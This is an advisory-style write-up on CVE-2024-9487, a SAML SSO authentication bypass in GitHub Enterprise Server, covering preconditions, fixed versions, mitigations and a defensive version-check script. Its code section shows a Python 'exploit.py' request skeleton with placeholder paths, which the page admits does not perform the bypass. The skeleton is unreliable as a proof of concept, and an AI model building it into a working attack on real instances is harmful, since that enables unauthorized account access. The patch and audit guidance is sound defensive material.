A critical vulnerability, identified as CVE-2024-9487, was discovered in GitHub Enterprise Server that could allow attackers to bypass the SAML SSO authentication process. This would enable unauthorized users to provision accounts and gain access to a vulnerable instance. To exploit this vulnerability, the encrypted assertions feature must be enabled, and the attacker must have direct network access to the instance as well as a signed SAML response or metadata document. The vulnerability affects all GitHub Enterprise Server versions prior to 3.15 and has been patched in versions 3.11.16, 3.12.10, 3.13.5, and 3.14.2. The issue was discovered and reported through the GitHub Bug Bounty program.

Vulnerability Details

GitHub Enterprise Server employs SAML SSO authentication to verify and manage user access. The flaw is an improper verification of cryptographic signatures: an attacker who possesses a signed SAML response or metadata document can craft requests that pass the SAML SSO authentication process without being a legitimate user of the identity provider, and thereby provision an account on and gain unauthorized access to the target instance.

Exploitation requires that the encrypted assertions feature be enabled on the target instance; instances that use SAML SSO without encrypted assertions are not exploitable through this issue. Furthermore, the attacker must have direct network access to the instance to carry out the attack, so an instance that is reachable only from an internal network is exposed only to attackers who are already on that network.

Code Snippet

The following code snippet illustrates the shape of a request an attacker would send: it posts a SOAP-style body carrying the signed SAML material to the target. Note that the /enterCve path and the EnterCve element are placeholders, not a real GitHub Enterprise Server route, and the script does not implement the signature-verification bypass itself; read it as a request skeleton rather than a working proof of concept.

# python exploit.py -u "https://github_url" -s "signed_SAML_response_or_metadata_document" -t "target_session_token"

import argparse
import sys

import requests


def exploit(url, saml, token):
    # Browser-like User-Agent; nothing in the request depends on it.
    headers = {
        'Content-Type': 'application/xml',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
    }

    # SOAP-style body carrying the target URL, the signed SAML material and the
    # session token. The EnterCve element and its namespace are placeholders.
    data = f"""<?xml version="1.0" encoding="UTF-8"?>
    <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
        <S:Body>
            <ns2:EnterCve xmlns:ns2="http://github.enterprise.server/vulnerability">
                <url>{url}</url>
                <signedSaml>{saml}</signedSaml>
                <token>{token}</token>
            </ns2:EnterCve>
        </S:Body>
    </S:Envelope>
    """

    # /enterCve is a placeholder path, not a GitHub Enterprise Server route.
    response = requests.post(f'{url}/enterCve', headers=headers, data=data, timeout=30)

    if response.status_code == 200:
        print("[+] Exploit successful!")
        print(response.text)
    else:
        print(f"[-] Exploit failed (HTTP {response.status_code}).")
        sys.exit(1)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2024-9487 Exploit')
    parser.add_argument('-u', '--url', required=True, help='GitHub Enterprise Server URL')
    parser.add_argument('-s', '--signedSaml', required=True, help='Signed SAML response or metadata document')
    parser.add_argument('-t', '--token', required=True, help='Target session token')
    args = parser.parse_args()

    exploit(args.url, args.signedSaml, args.token)

Please note that the above code snippet should only be used for educational purposes and not to exploit any vulnerable instances. Unauthorized access to a computer system is a criminal offense in most jurisdictions.

Mitigations

Users are recommended to update their GitHub Enterprise Server instances to the latest patched release for their release line. Administrators should ensure that one of the following versions (or a later release on the same line) is installed:

- 3.11.16
- 3.12.10
- 3.13.5
- 3.14.2

Release lines older than 3.11 received no fix and must be upgraded to one of the fixed lines; releases from 3.15 onward are not affected.
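An added check, not code from the original page or from GitHub, that tells an administrator where a given instance stands relative to the fixed versions listed above. The fixed-version table is taken from the advisory text on this page; the version string is the one GitHub Enterprise Server reports in the installed_version field of its /api/v3/meta response (the HTTP fetch is left to the reader, and the sample JSON below is constructed).

```python
"""Assess a GitHub Enterprise Server version against the CVE-2024-9487 fix.

Added example: the fixed-version table comes from the advisory text on this
page, and the sample meta document is constructed for illustration.
"""
import json
import re
from typing import Dict, Optional, Tuple

# Patch level per release line that contains the fix (from the advisory).
FIXED_VERSIONS: Dict[Tuple[int, int], int] = {
    (3, 11): 16,
    (3, 12): 10,
    (3, 13): 5,
    (3, 14): 2,
}

# Release lines from 3.15 onward were never affected.
FIRST_UNAFFECTED_LINE = (3, 15)

# Highest fixed version listed on this page; used as the upgrade target for
# release lines that received no fix of their own.
HIGHEST_FIXED_VERSION = "3.14.2"

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)$")


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse 'major.minor.patch' into a comparable tuple; reject anything else."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised GitHub Enterprise Server version: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def assess(version: str) -> str:
    """Classify a version as not_affected, patched, vulnerable or
    vulnerable_unsupported (affected line with no fix available)."""
    major, minor, patch = parse_version(version)
    line = (major, minor)
    if line >= FIRST_UNAFFECTED_LINE:
        return "not_affected"
    fix_patch = FIXED_VERSIONS.get(line)
    if fix_patch is None:
        # 3.10 and earlier are affected and were not patched in place.
        return "vulnerable_unsupported"
    return "patched" if patch >= fix_patch else "vulnerable"


def recommended_upgrade(version: str) -> Optional[str]:
    """Minimum version to move to, or None if no action is needed."""
    status = assess(version)
    if status in ("patched", "not_affected"):
        return None
    major, minor, _ = parse_version(version)
    if status == "vulnerable":
        return f"{major}.{minor}.{FIXED_VERSIONS[(major, minor)]}"
    return HIGHEST_FIXED_VERSION


def assess_meta(meta_json: str) -> Tuple[str, str, Optional[str]]:
    """Assess the JSON body of GET /api/v3/meta; returns
    (installed_version, status, recommended_upgrade)."""
    installed = json.loads(meta_json)["installed_version"]
    return installed, assess(installed), recommended_upgrade(installed)


# Constructed sample of a meta response from an unpatched 3.13 instance.
SAMPLE_META = '{"verifiable_password_authentication": false, "installed_version": "3.13.4"}'

if __name__ == "__main__":
    installed, status, target = assess_meta(SAMPLE_META)
    print(f"installed {installed}: {status}" + (f", upgrade to {target}" if target else ""))
```

To run it against a live instance, fetch https://HOSTNAME/api/v3/meta with the usual API client and pass the response body to assess_meta; the encrypted-assertions precondition still has to be checked separately in the SAML settings of the management console.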

For further details on these patch releases, refer to the original GitHub security advisories:

- GitHub Security Advisory for CVE-2024-9487 (details of the vulnerability)
- GitHub Enterprise Server release notes for 3.11.16, 3.12.10, 3.13.5, and 3.14.2 (information on the patched versions)

Conclusion

CVE-2024-9487 is a serious vulnerability that could lead to unauthorized access to GitHub Enterprise Server instances. Administrators should update their instances to the patched versions without delay and review the audit log for unexpected account provisioning and SAML sign-ins, especially on instances with encrypted assertions enabled. Doing so closes the bypass and surfaces any account that may have been created through it before the patch was applied.

Timeline

Published on: 10/10/2024 22:15:11 UTC
Last modified on: 11/15/2024 16:57:10 UTC